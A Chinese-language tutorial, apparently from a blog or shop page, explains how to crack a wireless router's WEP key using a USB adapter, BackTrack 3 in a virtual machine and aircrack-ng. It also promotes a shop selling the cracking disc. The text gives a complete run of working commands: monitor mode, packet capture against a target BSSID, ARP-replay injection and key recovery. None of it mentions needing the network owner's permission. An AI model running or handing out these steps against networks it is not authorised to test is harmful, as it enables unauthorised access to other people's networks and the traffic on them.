本文方法不限于TL-WN321G+这块网卡。其他网卡即可。之所以,使用这块网卡,是淘宝此卡出货量较大。且网上用虚拟机破解此网卡详细教程较少。
pdf版本这里查看
http://www.docin.com/p-3424406.html
破解需要的光盘这里购买
http://zhangzhm.taobao.com/shop/xshop/wui_page-cat-33755369-122391710-QmFja1RyYWNr.htm?checkedRange=true
本文描述的方法是破解的整个过程。
其他高级的攻击技术(无客户端,只有ap。等情况),另作文章描述。
破解以前,需要获得如下信息:
本机IP地址
无线路由器MAC地址
无线路由器名称
无线网络频道号
1. 首先使用nerwork stumbler获得以上信息。
自己网卡的信息通过ipconfig/all命令行查询
1. 是无线路由的mac
2.是无线路由的名字
3.是无限网络用到的频道号
需要的信息我们基本上都有了。下载BT3,安装虚拟机。
用虚拟机启动下载的iso,使用usb网卡,直接在虚拟机上会认不出来。
只要将usb拔下来,重新插上即可。虚拟机一般认出来是rausb0
启动虚拟机,开三个不同的shell,运行一下三个命令,等待密码出现即可,剩下的就是等待
64位加密需要3万加密数据,128位需要10万数据即可。
第一个shell:数据抓包
1. 先ifocnfig -a查看自己的网卡名称
airmon-ng start rausb0 1
rausb0是自己的网卡名称
1是频道号
airodump-ng -c 1 --bssid 00:14:78:A2:BB:5C -w outputs rausb0
--bssid 无线路由MAC地址
键入此命令后,可以查看到1频道中数据量,上面的data一直在走我们说的3万数据包和10万数据包就是指这个值。
第二个shell :产生数据
aireplay-ng -3 -b 00:14:78:A2:BB:5C -h 00:1d:0f:06:02:7f rausb0
-h 本机MAC地址
-b 无线路由MAC地址
第三个shell:破解
aircrack-ng -z -b 00:14:78:A2:BB:5C outputs.cap
然后等待密码出现即可。当数据不足时,他会等待数据接收够后,继续破解。无需干预,只要等最后的密码出现就好.